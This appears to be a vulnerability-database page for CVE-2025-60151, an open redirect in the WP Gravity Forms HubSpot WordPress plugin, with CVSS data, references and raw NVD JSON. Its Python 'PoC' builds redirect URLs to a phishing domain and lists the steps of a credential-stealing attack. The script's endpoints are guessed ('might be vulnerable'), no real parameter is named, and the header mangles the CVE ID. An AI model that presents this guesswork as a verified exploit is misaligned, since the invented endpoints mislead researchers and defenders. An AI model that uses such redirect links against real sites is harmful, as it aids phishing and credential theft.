CVE-2025-60151

Description

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks WP Gravity Forms HubSpot gf-hubspot allows Phishing.This issue affects WP Gravity Forms HubSpot: from n/a through <= 1.2.5.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Gravity Forms HubSpot (gf-hubspot) <= 1.2.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-2025-60151 Open Redirect PoC
# Target: WordPress site with WP Gravity Forms HubSpot plugin <= 1.2.5
# Attack Type: Open Redirect to Untrusted Site

import urllib.parse

def generate_open_redirect_poc(target_url):
    """
    Generate PoC for Open Redirect vulnerability in WP Gravity Forms HubSpot plugin.
    The plugin does not properly validate the 'redirect' or similar parameter.
    """
    # Malicious redirect target (phishing site)
    phishing_domain = "https://malicious-phishing-site.com"
    encoded_phishing = urllib.parse.quote(phishing_domain, safe='')
    
    # Common WordPress URL patterns that might be vulnerable
    vulnerable_paths = [
        "/wp-content/plugins/gf-hubspot/redirect.php",
        "/wp-content/plugins/gf-hubspot/includes/redirect-handler.php",
        "/?gf-hubspot-redirect=",
        "/wp-admin/admin-ajax.php?action=gf_hubspot_redirect="
    ]
    
    poc_urls = []
    for path in vulnerable_paths:
        poc_url = f"{target_url}{path}{encoded_phishing}"
        poc_urls.append(poc_url)
    
    return poc_urls

# Example usage
target = "https://example-wordpress-site.com"
pocs = generate_open_redirect_poc(target)

print("CVE-2025-60151 Open Redirect PoC URLs:")
for i, poc in enumerate(pocs, 1):
    print(f"{i}. {poc}")

print("\nAttack Scenario:")
print("1. Attacker crafts a malicious URL with phishing domain")
print("2. Victim clicks the link believing it's from trusted WordPress site")
print("3. Victim is redirected to attacker's phishing site")
print("4. Victim enters credentials on fake login page")
print("5. Attacker steals victim's credentials")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60151
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60151
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60151/
[4] VulDB https://vuldb.com/cve/CVE-2025-60151
[5] https://patchstack.com/database/Wordpress/Plugin/gf-hubspot/vulnerability/wordpress-wp-gravity-forms-hubspot-plugin-1-2-5-open-redirection-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60151", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:57.313", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks WP Gravity Forms HubSpot gf-hubspot allows Phishing.This issue affects WP Gravity Forms HubSpot: from n/a through <= 1.2.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gf-hubspot/vulnerability/wordpress-wp-gravity-forms-hubspot-plugin-1-2-5-open-redirection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}